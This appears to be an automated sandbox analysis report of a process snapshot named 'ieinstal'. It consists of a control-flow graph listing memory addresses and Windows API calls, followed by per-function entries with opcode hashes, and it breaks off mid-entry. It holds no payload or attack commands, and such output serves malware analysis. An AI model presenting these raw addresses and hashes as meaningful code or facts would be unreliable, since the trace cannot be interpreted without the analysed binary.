16565->16567 16568 1ed5590b 16565->16568 16569 1ed55917 16568->16569 16572 1ed5592d 16568->16572 16570 1ed4b58e _vswprintf_s 11 API calls 16569->16570 16571 1ed55923 16570->16571 16571->16567 16572->16567 16573 1edbd380 16574 1edbd393 16573->16574 16576 1edbd38c 16573->16576 16575 1edbd3a0 GetPEB 16574->16575 16575->16576 16577 1ed336cc 16578 1ed336e6 16577->16578 16579 1ed336d4 GetPEB 16577->16579 16580 1ed336e5 16579->16580 15765 1ed3fab0 15766 1ed3fac2 15765->15766 15767 1ed3fb14 15765->15767 15801 1ed1eef0 15766->15801 15769 1ed3facd 15770 1ed3fadf 15769->15770 15773 1ed3fb18 15769->15773 15816 1ed1eb70 15770->15816 15781 1ed7bdcb 15773->15781 15806 1ed16d90 15773->15806 15774 1ed3fafa GetPEB 15774->15767 15775 1ed3fb09 15774->15775 15822 1ed1ff60 15775->15822 15779 1ed7bea7 15780 1ed176e2 GetPEB 15779->15780 15800 1ed3fc4b 15779->15800 15780->15800 15781->15779 15784 1ed7be19 15781->15784 15842 1ed0b150 15781->15842 15782 1ed3fba7 15786 1ed3fbe4 15782->15786 15782->15800 15830 1ed3fd22 15782->15830 15784->15779 15845 1ed175ce 15784->15845 15788 1ed7bf17 15786->15788 15789 1ed3fc47 15786->15789 15786->15800 15791 1ed3fd22 GetPEB 15788->15791 15788->15800 15792 1ed3fd22 GetPEB 15789->15792 15789->15800 15790 1ed7be54 15795 1ed7be92 15790->15795 15790->15800 15849 1ed176e2 15790->15849 15793 1ed7bf22 15791->15793 15794 1ed3fcb2 15792->15794 15797 1ed3fd9b 3 API calls 15793->15797 15793->15800 15794->15800 15834 1ed3fd9b 15794->15834 15795->15779 15799 1ed176e2 GetPEB 15795->15799 15797->15800 15799->15779 15802 1ed1ef21 15801->15802 15803 1ed1ef0c 15801->15803 15804 1ed1ef29 15802->15804 15853 1ed1ef40 15802->15853 15803->15769 15804->15769 15807 1ed16dba 15806->15807 15809 1ed16da4 15806->15809 16157 1ed42e1c 15807->16157 15809->15781 15809->15782 15809->15800 15810 1ed16dbf 15811 1ed1eef0 26 API calls 15810->15811 15812 1ed16dca 15811->15812 15813 1ed16dde 15812->15813 16162 1ed0db60 15812->16162 15814 1ed1eb70 32 API calls 15813->15814 15814->15809 15817 1ed1eb81 15816->15817 15821 1ed1eb9e 15816->15821 15819 1ed1ebac 15817->15819 15817->15821 16270 1ed9ff10 15817->16270 15819->15821 16266 1ed04dc0 15819->16266 15821->15767 15821->15774 15823 1ed1ff99 15822->15823 15824 1ed1ff6d 15822->15824 15825 1edd88f5 32 API calls 15823->15825 15824->15823 15826 1ed1ff80 GetPEB 15824->15826 15827 1ed1ff94 15825->15827 15826->15823 15828 1ed1ff8f 15826->15828 15827->15767 16369 1ed20050 15828->16369 15831 1ed3fd3a 15830->15831 15833 1ed3fd31 _vswprintf_s 15830->15833 15831->15833 16403 1ed17608 15831->16403 15833->15786 15835 1ed3fdba GetPEB 15834->15835 15836 1ed3fdcc 15834->15836 15835->15836 15837 1ed3fdf2 15836->15837 15838 1ed7c0bd 15836->15838 15841 1ed3fdfc 15836->15841 15840 1ed176e2 GetPEB 15837->15840 15837->15841 15839 1ed7c0d3 GetPEB 15838->15839 15838->15841 15839->15841 15840->15841 15841->15800 15843 1ed0b171 _vswprintf_s 11 API calls 15842->15843 15844 1ed0b16e 15843->15844 15844->15784 15846 1ed175eb 15845->15846 15847 1ed175db 15845->15847 15846->15790 15847->15846 15848 1ed17608 GetPEB 15847->15848 15848->15846 15850 1ed176e6 15849->15850 15851 1ed176fd 15849->15851 15850->15851 15852 1ed176ec GetPEB 15850->15852 15851->15795 15852->15851 15854 1ed1f0bd 15853->15854 15856 1ed1ef5d 15853->15856 15854->15856 15885 1ed09080 15854->15885 15858 1ed1f071 15856->15858 15860 1ed1f042 15856->15860 15861 1ed02d8a 15856->15861 15858->15803 15859 1ed1f053 GetPEB 15859->15858 15860->15858 15860->15859 15862 1ed02db8 15861->15862 15869 1ed02df1 _vswprintf_s 15861->15869 15862->15869 15891 1ed31624 15862->15891 15863 1ed5f9d0 GetPEB 15865 1ed5f9e3 GetPEB 15863->15865 15865->15869 15869->15863 15869->15865 15870 1ed02e5a 15869->15870 15889 1ed27d50 GetPEB 15869->15889 15898 1ed9fe87 15869->15898 15905 1ed9fdda 15869->15905 15911 1ed9ffb9 15869->15911 15919 1ed95720 15869->15919 15871 1ed02e69 _vswprintf_s 15870->15871 15872 1ed27d50 GetPEB 15870->15872 15871->15856 15874 1ed5fa76 15872->15874 15875 1ed5fa8a 15874->15875 15876 1ed5fa7a GetPEB 15874->15876 15875->15871 15878 1ed5fa97 GetPEB 15875->15878 15876->15875 15878->15871 15879 1ed5faaa 15878->15879 15880 1ed27d50 GetPEB 15879->15880 15881 1ed5faaf 15880->15881 15882 1ed5fac3 15881->15882 15883 1ed5fab3 GetPEB 15881->15883 15882->15871 15922 1ed87016 15882->15922 15883->15882 15886 1ed09098 15885->15886 15887 1ed0909e GetPEB 15885->15887 15886->15887 15888 1ed090aa 15887->15888 15888->15856 15890 1ed27d5d 15889->15890 15890->15869 15934 1ed316e0 15891->15934 15893 1ed31630 15897 1ed31691 15893->15897 15938 1ed316c7 15893->15938 15896 1ed3165a 15896->15897 15945 1ed3a185 15896->15945 15897->15869 15899 1ed27d50 GetPEB 15898->15899 15900 1ed9fec1 15899->15900 15901 1ed9fec5 GetPEB 15900->15901 15902 1ed9fed5 _vswprintf_s 15900->15902 15901->15902 15976 1ed4b640 15902->15976 15904 1ed9fef8 15904->15869 15906 1ed9fdff __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 15905->15906 15907 1ed95720 _vswprintf_s 11 API calls 15906->15907 15908 1ed9fe0f 15907->15908 15909 1ed95720 _vswprintf_s 11 API calls 15908->15909 15910 1ed9fe39 15909->15910 15910->15869 15912 1ed9ffc8 _vswprintf_s 15911->15912 16111 1ed3e730 15912->16111 15914 1eda0067 15916 1ed5d130 _vswprintf_s 11 API calls 15914->15916 15915 1ed9ffd5 15915->15914 15917 1ed90c30 _vswprintf_s 11 API calls 15915->15917 15918 1eda009a 15916->15918 15917->15914 15918->15869 16117 1ed0b171 15919->16117 15923 1ed87052 15922->15923 15924 1ed87073 GetPEB 15923->15924 15929 1ed87084 15923->15929 15924->15929 15925 1ed87125 GetPEB 15926 1ed87136 15925->15926 15927 1ed4b640 _vswprintf_s 11 API calls 15926->15927 15928 1ed87147 15927->15928 15928->15871 15929->15926 15930 1ed27d50 GetPEB 15929->15930 15933 1ed87101 _vswprintf_s 15929->15933 15931 1ed870ec 15930->15931 15932 1ed870f0 GetPEB 15931->15932 15931->15933 15932->15933 15933->15925 15933->15926 15935 1ed316ed 15934->15935 15936 1ed316f3 GetPEB 15935->15936 15937 1ed316f1 15935->15937 15936->15937 15937->15893 15939 1ed755f4 15938->15939 15940 1ed316da 15938->15940 15950 1edbbbf0 15939->15950 15940->15896 15944 1ed7560a 15946 1ed3a192 15945->15946 15947 1ed3a1a0 15945->15947 15946->15897 15947->15946 15948 1ed3a1b0 GetPEB 15947->15948 15949 1ed3a1c1 15948->15949 15949->15897 15951 1edbbc12 15950->15951 15952 1ed755fb 15951->15952 15958 1edbc08a 15951->15958 15952->15944 15954 1edbbf33 15952->15954 15955 1edbbf4c 15954->15955 15957 1edbbf97 15955->15957 15971 1edbbe9b 15955->15971 15957->15944 15959 1edbc0c6 15958->15959 15961 1edbc104 _vswprintf_s 15959->15961 15962 1edbbfdb 15959->15962 15961->15952 15963 1edbbfeb 15962->15963 15964 1edbbfef 15962->15964 15963->15961 15964->15963 15966 1edbbdfa 15964->15966 15968 1edbbe17 15966->15968 15967 1edbbe6d 15967->15963 15968->15967 15970 1ed49660 LdrInitializeThunk 15968->15970 15970->15967 15972 1edbbeb3 15971->15972 15973 1edbbf08 15972->15973 15975 1ed49660 LdrInitializeThunk 15972->15975 15973->15957 15975->15973 15977 1ed4b648 15976->15977 15978 1ed4b64b 15976->15978 15977->15904 15981 1edbb590 15978->15981 15980 1ed4b74a _vswprintf_s 15980->15904 15984 1edbb260 15981->15984 15983 1edbb5a3 15983->15980 16042 1ed5d08c 15984->16042 15986 1edbb26c GetPEB 15987 1edbb279 GetPEB 15986->15987 15989 1edbb293 15987->15989 15990 1edbb48b 15989->15990 15991 1edbb2ba 15989->15991 16041 1edbb54b 15989->16041 15992 1ed95720 _vswprintf_s 9 API calls 15990->15992 15993 1edbb2c6 15991->15993 15994 1edbb414 15991->15994 15995 1edbb49e 15992->15995 15998 1edbb2ce 15993->15998 15999 1edbb32d 15993->15999 15996 1ed95720 _vswprintf_s 9 API calls 15994->15996 16005 1ed95720 _vswprintf_s 9 API calls 15995->16005 16000 1edbb427 15996->16000 15997 1edbb56b _vswprintf_s 15997->15983 16002 1edbb2da 15998->16002 16003 1edbb2f3 15998->16003 16007 1edbb396 15999->16007 16013 1edbb34d 15999->16013 16039 1edbb2eb 15999->16039 16006 1ed95720 _vswprintf_s 9 API calls 16000->16006 16008 1ed95720 _vswprintf_s 9 API calls 16002->16008 16004 1ed95720 _vswprintf_s 9 API calls 16003->16004 16009 1edbb302 16004->16009 16010 1edbb4c2 16005->16010 16012 1edbb43e 16006->16012 16011 1ed95720 _vswprintf_s 9 API calls 16007->16011 16008->16039 16015 1ed95720 _vswprintf_s 9 API calls 16009->16015 16016 1edbb4cc 16010->16016 16026 1edbb320 16010->16026 16017 1edbb3aa 16011->16017 16018 1ed95720 _vswprintf_s 9 API calls 16012->16018 16019 1ed95720 _vswprintf_s 9 API calls 16013->16019 16014 1ed95720 _vswprintf_s 9 API calls 16020 1edbb4fd 16014->16020 16022 1edbb311 16015->16022 16023 1ed95720 _vswprintf_s 9 API calls 16016->16023 16024 1edbb38f 16017->16024 16025 1edbb3b6 16017->16025 16018->16026 16027 1edbb361 16019->16027 16021 1edbb519 16020->16021 16028 1ed95720 _vswprintf_s 9 API calls 16020->16028 16029 1ed95720 _vswprintf_s 9 API calls 16021->16029 16030 1ed95720 _vswprintf_s 9 API calls 16022->16030 16023->16039 16036 1ed95720 _vswprintf_s 9 API calls 16024->16036 16031 1ed95720 _vswprintf_s 9 API calls 16025->16031 16032 1ed95720 _vswprintf_s 9 API calls 16026->16032 16026->16039 16027->16024 16033 1edbb371 16027->16033 16028->16021 16034 1edbb528 16029->16034 16030->16026 16035 1edbb3c5 16031->16035 16032->16039 16037 1ed95720 _vswprintf_s 9 API calls 16033->16037 16040 1ed95720 _vswprintf_s 9 API calls 16034->16040 16034->16041 16038 1ed95720 _vswprintf_s 9 API calls 16035->16038 16036->16039 16037->16039 16038->16039 16039->16014 16040->16041 16041->15997 16043 1ed90c30 16041->16043 16042->15986 16044 1ed90c50 16043->16044 16052 1ed90c49 16043->16052 16053 1ed9193b 16044->16053 16046 1ed90c5e 16046->16052 16059 1ed91c76 16046->16059 16052->15997 16054 1ed9194c 16053->16054 16058 1ed91967 _vswprintf_s 16053->16058 16076 1ed91c49 16054->16076 16056 1ed91c49 _vswprintf_s LdrInitializeThunk 16057 1ed91951 _vswprintf_s 16056->16057 16057->16056 16057->16058 16058->16046 16079 1ed49670 16059->16079 16077 1ed49670 _vswprintf_s LdrInitializeThunk 16076->16077 16078 1ed91c65 16077->16078 16078->16057 16080 1ed4967a _vswprintf_s LdrInitializeThunk 16079->16080 16112 1ed49670 _vswprintf_s LdrInitializeThunk 16111->16112 16113 1ed3e747 16112->16113 16114 1ed3e74b 16113->16114 16115 1ed3e784 GetPEB 16113->16115 16114->15915 16116 1ed3e7a8 16115->16116 16116->15915 16118 1ed0b180 _vswprintf_s 16117->16118 16119 1ed0b1b0 GetPEB 16118->16119 16126 1ed0b1c0 _vswprintf_s 16118->16126 16119->16126 16120 1ed5d130 _vswprintf_s 9 API calls 16121 1ed0b1de 16120->16121 16121->15869 16122 1ed64904 GetPEB 16124 1ed0b1d1 _vswprintf_s 16122->16124 16124->16120 16126->16122 16126->16124 16127 1ed4e2d0 16126->16127 16130 1ed4e2ed 16127->16130 16129 1ed4e2e8 16129->16126 16131 1ed4e30f 16130->16131 16132 1ed4e2fb 16130->16132 16134 1ed4e332 16131->16134 16135 1ed4e31e 16131->16135 16139 1ed4b58e 16132->16139 16144 1ed52440 16134->16144 16137 1ed4b58e _vswprintf_s 11 API calls 16135->16137 16138 1ed4e307 _vswprintf_s 16137->16138 16138->16129 16140 1ed0b150 _vswprintf_s 11 API calls 16139->16140 16141 1ed4b627 16140->16141 16142 1ed4b640 _vswprintf_s 11 API calls 16141->16142 16143 1ed4b632 16142->16143 16143->16138 16145 1ed524af 16144->16145 16146 1ed5249a 16144->16146 16148 1ed524b7 16145->16148 16156 1ed524cc __aulldvrm _vswprintf_s 16145->16156 16147 1ed4b58e _vswprintf_s 11 API calls 16146->16147 16150 1ed524a4 16147->16150 16149 1ed4b58e _vswprintf_s 11 API calls 16148->16149 16149->16150 16151 1ed4b640 _vswprintf_s 11 API calls 16150->16151 16152 1ed52d6e 16151->16152 16152->16138 16153 1ed52d4f 16154 1ed4b58e _vswprintf_s 11 API calls 16153->16154 16154->16150 16155 1ed558ee 11 API calls __cftof 16155->16156 16156->16150 16156->16153 16156->16155 16158 1ed42e32 16157->16158 16159 1ed42e57 16158->16159 16170 1ed49840 LdrInitializeThunk 16158->16170 16159->15810 16161 1ed7df2e 16163 1ed0db91 16162->16163 16164 1ed0db6d 16162->16164 16163->15813 16164->16163 16171 1ed0db40 GetPEB 16164->16171 16166 1ed0db76 16166->16163 16173 1ed0e7b0 16166->16173 16168 1ed0db87 16168->16163 16169 1ed64fa6 GetPEB 16168->16169 16169->16163 16170->16161 16172 1ed0db52 16171->16172 16172->16166 16174 1ed0e7e0 16173->16174 16175 1ed0e7ce 16173->16175 16178 1ed0b150 _vswprintf_s 11 API calls 16174->16178 16179 1ed0e7e8 16174->16179 16175->16179 16181 1ed13d34 16175->16181 16178->16179 16180 1ed0e7f6 16179->16180 16220 1ed0dca4 16179->16220 16180->16168 16182 1ed68213 16181->16182 16183 1ed13d6c 16181->16183 16187 1ed6822b GetPEB 16182->16187 16207 1ed14068 16182->16207 16233 1ed11b8f 16183->16233 16185 1ed13d81 16185->16182 16186 1ed13d89 16185->16186 16188 1ed11b8f 2 API calls 16186->16188 16187->16207 16189 1ed13d9e 16188->16189 16190 1ed13da2 GetPEB 16189->16190 16191 1ed13dba 16189->16191 16190->16191 16192 1ed11b8f 2 API calls 16191->16192 16193 1ed13dd2 16192->16193 16195 1ed13e91 16193->16195 16196 1ed13deb GetPEB 16193->16196 16193->16207 16194 1ed68344 GetPEB 16197 1ed1407a 16194->16197 16199 1ed11b8f 2 API calls 16195->16199 16213 1ed13dfc _vswprintf_s 16196->16213 16198 1ed14085 16197->16198 16201 1ed68363 GetPEB 16197->16201 16198->16174 16200 1ed13ea9 16199->16200 16202 1ed13f6a 16200->16202 16204 1ed13ec2 GetPEB 16200->16204 16200->16207 16201->16198 16203 1ed11b8f 2 API calls 16202->16203 16205 1ed13f82 16203->16205 16218 1ed13ed3 _vswprintf_s 16204->16218 16206 1ed13f9b GetPEB 16205->16206 16205->16207 16219 1ed13fac _vswprintf_s 16206->16219 16207->16194 16207->16197 16208 1ed13e62 GetPEB 16209 1ed13e74 16208->16209 16209->16195 16210 1ed13e81 GetPEB 16209->16210 16210->16195 16211 1ed13f4d 16211->16202 16214 1ed13f5a GetPEB 16211->16214 16212 1ed13f3b GetPEB 16212->16211 16213->16207 16213->16208 16213->16209 16214->16202 16215 1ed68324 GetPEB 16215->16207 16216 1ed1404f 16216->16207 16217 1ed14058 GetPEB 16216->16217 16217->16207 16218->16207 16218->16211 16218->16212 16219->16207 16219->16215 16219->16216 16222 1ed0dcfd 16220->16222 16231 1ed0dd6f _vswprintf_s 16220->16231 16221 1ed0dd47 16246 1ed0dbb1 16221->16246 16222->16221 16226 1ed0dfae _vswprintf_s 16222->16226 16239 1ed0e620 16222->16239 16224 1ed64ff2 16224->16224 16229 1ed4b640 _vswprintf_s 11 API calls 16226->16229 16230 1ed0dfe4 16229->16230 16230->16180 16231->16224 16231->16226 16253 1ed0e375 16231->16253 16237 1ed11ba9 _vswprintf_s 16233->16237 16238 1ed11c05 16233->16238 16234 1ed6701a GetPEB 16235 1ed11c21 16234->16235 16235->16185 16236 1ed11bf4 GetPEB 16236->16238 16237->16235 16237->16236 16237->16238 16238->16234 16238->16235 16240 1ed0e644 16239->16240 16241 1ed65503 16239->16241 16240->16241 16258 1ed0f358 16240->16258 16243 1ed0e661 _vswprintf_s 16244 1ed0e729 GetPEB 16243->16244 16245 1ed0e73b 16243->16245 16244->16245 16245->16221 16262 1ed1766d 16246->16262 16248 1ed0dbcf 16248->16231 16249 1ed0dbf1 16248->16249 16250 1ed0dc05 16249->16250 16251 1ed1766d GetPEB 16250->16251 16252 1ed0dc22 16251->16252 16252->16231 16257 1ed0e3a3 16253->16257 16254 1ed4b640 _vswprintf_s 11 API calls 16256 1ed0e400 16254->16256 16255 1ed65306 16256->16231 16257->16254 16257->16255 16259 1ed0f370 16258->16259 16260 1ed0f38c 16259->16260 16261 1ed0f379 GetPEB 16259->16261 16260->16243 16261->16260 16264 1ed17687 16262->16264 16263 1ed176d3 16263->16248 16264->16263 16265 1ed176c2 GetPEB 16264->16265 16265->16263 16267 1ed04dd1 16266->16267 16269 1ed04df3 16267->16269 16283 1ed04f2e 16267->16283 16269->15821 16368 1ed5d0e8 16270->16368 16272 1ed9ff1c GetPEB 16273 1ed9ff43 GetPEB 16272->16273 16275 1ed9ff2b 16272->16275 16276 1ed9ff4f 16273->16276 16277 1ed9ff6e 16273->16277 16274 1ed9ffb1 16279 1ed5d130 _vswprintf_s 11 API calls 16274->16279 16275->16273 16275->16274 16280 1ed95720 _vswprintf_s 11 API calls 16276->16280 16278 1ed3e730 2 API calls 16277->16278 16282 1ed9ff7d 16278->16282 16281 1ed9ffb6 16279->16281 16280->16277 16281->15819 16282->15819 16284 1ed60b85 16283->16284 16287 1ed04f3e 16283->16287 16285 1ed60b9a 16284->16285 16286 1ed60b8b GetPEB 16284->16286 16292 1edd88f5 16285->16292 16286->16285 16288 1ed60b9f 16286->16288 16287->16284 16290 1ed04f5b GetPEB 16287->16290 16290->16284 16291 1ed04f6e 16290->16291 16291->16269 16293 1edd8901 _vswprintf_s 16292->16293 16298 1ed0cc50 16293->16298 16295 1edd891f 16296 1ed5d130 _vswprintf_s 11 API calls 16295->16296 16297 1edd8946 16296->16297 16297->16288 16301 1ed0cc79 16298->16301 16299 1ed0cc7e 16300 1ed4b640 _vswprintf_s 11 API calls 16299->16300 16302 1ed0cc89 16300->16302 16301->16299 16304 1ed3b230 16301->16304 16302->16295 16305 1ed3b26a 16304->16305 16306 1ed7a2f6 16304->16306 16305->16306 16307 1ed7a2fd 16305->16307 16312 1ed3b2ab _vswprintf_s 16305->16312 16308 1ed3b2b5 16307->16308 16322 1edd5ba5 16307->16322 16308->16306 16309 1ed4b640 _vswprintf_s 11 API calls 16308->16309 16311 1ed3b2d0 16309->16311 16311->16299 16312->16308 16314 1ed0ccc0 16312->16314 16315 1ed0cd04 16314->16315 16316 1ed0b150 _vswprintf_s 11 API calls 16315->16316 16321 1ed0cd95 16315->16321 16317 1ed64e0a 16316->16317 16318 1ed0b150 _vswprintf_s 11 API calls 16317->16318 16319 1ed64e14 16318->16319 16320 1ed0b150 _vswprintf_s 11 API calls 16319->16320 16320->16321 16321->16308 16323 1edd5bb4 _vswprintf_s 16322->16323 16329 1edd5c10 16323->16329 16330 1edd5c2a _vswprintf_s 16323->16330 16333 1edd4c56 16323->16333 16325 1ed5d130 _vswprintf_s 11 API calls 16326 1edd63e5 16325->16326 16326->16308 16329->16325 16330->16329 16331 1edd60cf GetPEB 16330->16331 16332 1ed49710 LdrInitializeThunk 16330->16332 16337 1ed46de6 16330->16337 16331->16330 16332->16330 16334 1edd4c62 _vswprintf_s 16333->16334 16335 1ed5d130 _vswprintf_s 11 API calls 16334->16335 16336 1edd4caa 16335->16336 16336->16330 16338 1ed46e73 16337->16338 16339 1ed46e03 16337->16339 16338->16330 16339->16338 16341 1ed46e53 16339->16341 16343 1ed46ebe 16339->16343 16341->16338 16351 1ed36a60 16341->16351 16344 1ed1eef0 26 API calls 16343->16344 16345 1ed46eeb 16344->16345 16346 1ed46f0d 16345->16346 16356 1ed47742 16345->16356 16362 1edb84e0 16345->16362 16347 1ed1eb70 32 API calls 16346->16347 16348 1ed46f48 16347->16348 16348->16339 16352 1ed78025 16351->16352 16354 1ed36a8d _vswprintf_s 16351->16354 16353 1ed4b640 _vswprintf_s 11 API calls 16355 1ed36b66 16353->16355 16354->16352 16354->16353 16355->16338 16357 1ed47827 16356->16357 16359 1ed47768 _vswprintf_s 16356->16359 16357->16345 16358 1ed49660 _vswprintf_s LdrInitializeThunk 16358->16359 16359->16357 16359->16358 16360 1ed1eef0 26 API calls 16359->16360 16361 1ed1eb70 32 API calls 16359->16361 16360->16359 16361->16359 16363 1edb8511 16362->16363 16364 1ed1eb70 32 API calls 16363->16364 16367 1edb8556 16364->16367 16365 1ed1eef0 26 API calls 16366 1edb85f1 16365->16366 16366->16345 16367->16365 16368->16272 16370 1ed20074 16369->16370 16371 1ed2009d GetPEB 16370->16371 16382 1ed200ef 16370->16382 16372 1ed6c01b 16371->16372 16375 1ed200d0 16371->16375 16374 1ed6c024 GetPEB 16372->16374 16372->16375 16373 1ed4b640 _vswprintf_s 11 API calls 16376 1ed20105 16373->16376 16374->16375 16377 1ed6c037 16375->16377 16378 1ed200df 16375->16378 16376->15827 16387 1edd8a62 16377->16387 16383 1ed39702 16378->16383 16381 1ed6c04b 16381->16381 16382->16373 16385 1ed39720 16383->16385 16386 1ed39784 16385->16386 16394 1edd8214 16385->16394 16386->16382 16388 1ed27d50 GetPEB 16387->16388 16389 1edd8a9d 16388->16389 16390 1edd8aa1 GetPEB 16389->16390 16391 1edd8ab1 _vswprintf_s 16389->16391 16390->16391 16392 1ed4b640 _vswprintf_s 11 API calls 16391->16392 16393 1edd8ad7 16392->16393 16393->16381 16396 1edd823b 16394->16396 16395 1edd82c0 16395->16386 16396->16395 16398 1ed33b7a GetPEB 16396->16398 16402 1ed33bb5 _vswprintf_s 16398->16402 16399 1ed76298 16400 1ed33c1b GetPEB 16401 1ed33c35 16400->16401 16401->16395 16402->16399 16402->16400 16402->16402 16404 1ed17620 16403->16404 16405 1ed1766d GetPEB 16404->16405 16406 1ed17632 16405->16406 16406->15833 16408 1ed49670 16410 1ed4967a 16408->16410 16411 1ed49681 16410->16411 16412 1ed4968f LdrInitializeThunk 16410->16412 16581 1ed435b1 16582 1ed435ca 16581->16582 16583 1ed435f2 16581->16583 16582->16583 16584 1ed17608 GetPEB 16582->16584 16584->16583 16585 1edde5b6 16586 1edde608 16585->16586 16587 1edde5e1 16585->16587 16589 1ed4b640 _vswprintf_s 11 API calls 16586->16589 16587->16586 16591 1edded52 16587->16591 16590 1edde626 16589->16590 16594 1edded73 16591->16594 16592 1ed4b640 _vswprintf_s 11 API calls 16593 1eddee6d 16592->16593 16593->16587 16594->16592 16413 2d065be 16414 2d065c1 16413->16414 16414->16414 16415 2d065e6 TerminateThread 16414->16415 16416 2d0662c 16415->16416 16595 1ed00b60 16596 1ed00b72 16595->16596 16598 1ed00baf 16595->16598 16596->16598 16599 1ed00bd0 16596->16599 16600 1ed00c66 16599->16600 16606 1ed00c05 16599->16606 16601 1ed5e915 16600->16601 16602 1ed5e940 16600->16602 16605 1ed00c8d _vswprintf_s 16600->16605 16601->16605 16608 1ed51700 16601->16608 16604 1ed51700 11 API calls 16602->16604 16602->16605 16604->16605 16605->16598 16606->16600 16606->16605 16607 1ed51700 11 API calls 16606->16607 16607->16606 16611 1ed514e9 16608->16611 16610 1ed5171c 16610->16605 16612 1ed514fb 16611->16612 16613 1ed4b58e _vswprintf_s 11 API calls 16612->16613 16614 1ed5150e __cftof 16612->16614 16613->16614 16614->16610 16615 1ed335a1 16616 1ed335a7 16615->16616 16617 1ed335b7 16616->16617 16618 1ed335b8 GetPEB 16616->16618 16619 1ed1eb70 32 API calls 16618->16619 16619->16617 16620 1edc0a28 16621 1edc0a57 16620->16621 16623 1edc0a4d 16620->16623 16624 1ed34e70 16621->16624 16625 1ed34e94 16624->16625 16629 1ed34ec0 16624->16629 16626 1ed4b640 _vswprintf_s 11 API calls 16625->16626 16627 1ed34eac 16626->16627 16627->16623 16628 1edb8df1 12 API calls 16628->16625 16629->16625 16629->16628 16423 1edd5ba5 16424 1edd5bb4 _vswprintf_s 16423->16424 16425 1edd4c56 11 API calls 16424->16425 16430 1edd5c10 16424->16430 16431 1edd5c2a _vswprintf_s 16424->16431 16425->16431 16426 1ed5d130 _vswprintf_s 11 API calls 16427 1edd63e5 16426->16427 16429 1ed46de6 31 API calls 16429->16431 16430->16426 16431->16429 16431->16430 16432 1edd60cf GetPEB 16431->16432 16433 1ed49710 LdrInitializeThunk 16431->16433 16432->16431 16433->16431

                        Executed Functions

                        Function 1ED496E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 23 1ed496e0-1ed496ec LdrInitializeThunk
                        APIs
                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 1b6c00d2c1ac082ca3ccb186ccddb39ac0707fc9a757a78b76176c0e849dff8e
                        • Instruction ID: 65a90602e614fb329bd6b70c98b758e03ff59fdd58d64c9aea22dbfb8d659ce2
                        • Opcode Fuzzy Hash: 1b6c00d2c1ac082ca3ccb186ccddb39ac0707fc9a757a78b76176c0e849dff8e
                        • Instruction Fuzzy Hash: 7C90027120108807D511615A840475F00159BD4741F95C511E4414638D86D688D27571
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED49660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 22 1ed49660-1ed4966c LdrInitializeThunk
                        APIs
                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 1a2a4f285389ce24531e267a3e2ec7c070490b97a8620aaa520399888eeab167
                        • Instruction ID: f6a814b6c35a78c960069b0167adca79d45d854320987b6fc6be1201335899c2
                        • Opcode Fuzzy Hash: 1a2a4f285389ce24531e267a3e2ec7c070490b97a8620aaa520399888eeab167
                        • Instruction Fuzzy Hash: 9190027120100807D581715A440465F00159BD5741FD1C115E0015634DCA568ADA7BF1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED49780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 25 1ed49780-1ed4978c LdrInitializeThunk
                        APIs
                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: fbe2172ca20c2e0b7593d43bd5bd1b9918f4e7001d36c68623a42e9e5a44be63
                        • Instruction ID: 29d771cd8b60be49563eb81120f4d14bc2cab94f1b5324454dcadf706224fa2a
                        • Opcode Fuzzy Hash: fbe2172ca20c2e0b7593d43bd5bd1b9918f4e7001d36c68623a42e9e5a44be63
                        • Instruction Fuzzy Hash: 7C90026921300007D581715A540861F00159BD5642FD1D515E0005538CC95688EA6771
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED497A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 26 1ed497a0-1ed497ac LdrInitializeThunk
                        APIs
                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
